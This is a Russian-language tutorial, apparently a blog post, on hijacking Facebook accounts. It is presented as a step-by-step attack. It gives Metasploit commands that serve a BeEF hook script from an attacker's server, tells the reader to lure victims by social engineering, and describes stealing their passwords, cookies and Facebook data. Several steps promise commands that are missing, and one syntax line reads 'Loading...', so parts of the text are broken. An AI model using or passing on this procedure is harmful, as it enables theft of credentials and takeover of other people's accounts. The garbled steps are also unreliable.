В интернете есть множество советов о том, как взломать Facebook, многие из которых являются платными, не говоря уже о том, что они не работают. Не становитесь жертвами этих мошенников, поскольку не существует волшебного метода взлома Facebook. Есть только несколько способов эксплуатации уязвимостей Facebook с помощью нашего старого доброго друга социальной инженерии.

kali > msfconsole


Шаг 2: Найдите эксплойт.

Давайте загрузим эксплойт, введя следующую команду:
Шаг 3: Получите информацию об эксплойте.
Теперь, когда мы загрузили модуль эксплойта, мы можем получить подробную информацию о нем с помощью следующей команды:
Шаг 4: Настройте параметры.
Нам нужно установить параметр «REMOTE_JS», чтобы подключить жертву с помощью Beef.
Шаг 5: Откройте фреймворк Beef.
Теперь откройте Beef. Используя этот инструмент, мы можем легко взломать браузер жертвы и получить все пароли и файлы cookie.

Как только вы введете пароль, сервер Beef запустится, и вы увидите следующую страницу:

Учетные данные по умолчанию — «beef» для имени пользователя и нового пароля, который вы только что установили.
Шаг 6: Настройка JS на хук Beef.
Вернемся к консоли Metasploit. Чтобы взломать аккаунт жертвы в Facebook, нам нужно получить доступ к её данным браузера. Для этого установим REMOTE_JS в хук на Beef.
Для использования этого хака убедитесь, что вы используете правильный IP:
Синтаксис: set REMOTE_JS Loading...
Итак, в нашем случае команда Metasploit становится:
msf5> set REMOTE_JS http://192.168.128.182:3000/hook.js
Теперь нам нужно установить URIPATH в корневой каталог:
msf5> set uripath /

Шаг 7: Запуск веб-сервера Metasploit.
Запустите веб-сервер Metasploit, на котором будет размещен хук Beef:
msf > run

Шаг 8:Подождите, пока жертва зайдет на сайт из своего браузера.
Используйте социальную инженерию, чтобы заставить жертву нажать на ссылку.
Шаг 9: Подключаем браузер к Beef через Metasploit.
Когда жертва зайдет на наш вредоносный веб-сервер по адресу 192.168.128.182, JavaScript Beef подключится к её браузеру. Он появится в разделе «Hooked Browser» в Beef, после чего вы сможете управлять всеми данными.
Шаг 10: Теперь проверьте, аутентифицирован ли подключенный браузер с помощью Facebook.
Как только браузер подключится к Beef, отметьте опцию обнаружения социальных сетей. Используя эту опцию, вы сможете перехватить все данные в Facebook.
Поздравляем, вы успешно научились взламывать аккаунты Facebook с помощью Metasploit и Beef.
Заключение

Facebook по праву считается социальной сетью N° 1 в мире, на защиту которой пущены все средства. Именно поэтому, не стоит питать иллюзии, думая, что можно взломать Facebook за считанные секунды. Способ, описанный выше, не так прост в реализации, и требует определенных навыков и умений. Однако, если вы примете во внимание все изложенное в этой статье, наберетесь терпения, то тогда результат не заставит себя долго ждать.